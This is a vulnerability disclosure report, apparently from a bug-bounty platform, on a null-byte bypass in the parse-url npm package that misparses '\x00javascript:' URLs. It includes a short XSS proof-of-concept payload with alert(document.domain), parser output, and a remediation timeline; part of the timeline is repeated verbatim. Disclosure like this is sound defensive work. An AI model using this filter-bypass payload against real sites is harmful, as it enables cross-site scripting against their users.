Improper Input Validation in ionicabizau/parse-url

Valid

Reported on

Feb 24th 2022

Description

If an attacker inserts a null byte at the beginning of the javascript scheme, parse will not parse the javascript scheme properly. Therefore, all null bytes must be removed before parsing.

Proof of Concept

const parseUrl = require("parse-url")
url = parseUrl("\x00javascript:alert(document.domain)") // unreported
console.log(url)

output

{
  protocols: [],
  protocol: 'ssh',
  port: null,
  resource: '\u0000javascript',
  user: '',
  pathname: '/alert(document.domain)',
  hash: '',
  search: '',
  href: '\u0000javascript:alert(document.domain)',
  query: [Object: null prototype] {}
}

location.href = '\u0000javascript:alert(document.domain)'

This works fine in browsers!

References

https://hackerone.com/reports/496293

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 2 years ago

Pocas

commented 2 years ago

Researcher

const parser = require('url-parse');
console.log(parser("\x00javascript:alert(document.domain)"))

output

{
  slashes: false,
  protocol: 'javascript:',
  hash: '',
  query: '',
  pathname: 'alert(document.domain)',
  auth: '',
  host: '',
  port: '',
  hostname: '',
  password: '',
  username: '',
  origin: 'null',
  href: 'javascript:alert(document.domain)'
}

Above is the return value of the unshiftio/url-parse module.

Ionică Bizău (Johnny B.) validated this vulnerability 2 years ago

Pocas has been awarded the disclosure bounty

The fix bounty is now up for grabs

Pocas submitted a

patch

2 years ago

We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. 2 years ago

Pocas

commented 2 years ago

Researcher

Hello! when will you fix?

We have sent a second fix follow up to the ionicabizau/parse-url team. We will try again in 10 days. 2 years ago

We have sent a third and final fix follow up to the ionicabizau/parse-url team. This report is now considered stale. 2 years ago

Ionică Bizău (Johnny B.) marked this as fixed in 7.0.0 with commit 21c72a a year ago

Ionică Bizău (Johnny B.) has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 2 years ago

Pocas

commented 2 years ago

Researcher

const parser = require('url-parse');
console.log(parser("\x00javascript:alert(document.domain)"))

output

{
  slashes: false,
  protocol: 'javascript:',
  hash: '',
  query: '',
  pathname: 'alert(document.domain)',
  auth: '',
  host: '',
  port: '',
  hostname: '',
  password: '',
  username: '',
  origin: 'null',
  href: 'javascript:alert(document.domain)'
}

Above is the return value of the unshiftio/url-parse module.

Ionică Bizău (Johnny B.) validated this vulnerability 2 years ago

Pocas has been awarded the disclosure bounty

The fix bounty is now up for grabs

Pocas submitted a

patch

2 years ago

We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. 2 years ago

Pocas

commented 2 years ago

Researcher

Hello! when will you fix?

We have sent a second fix follow up to the ionicabizau/parse-url team. We will try again in 10 days. 2 years ago

We have sent a third and final fix follow up to the ionicabizau/parse-url team. This report is now considered stale. 2 years ago

Ionică Bizău (Johnny B.) marked this as fixed in 7.0.0 with commit 21c72a a year ago

Ionică Bizău (Johnny B.) has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation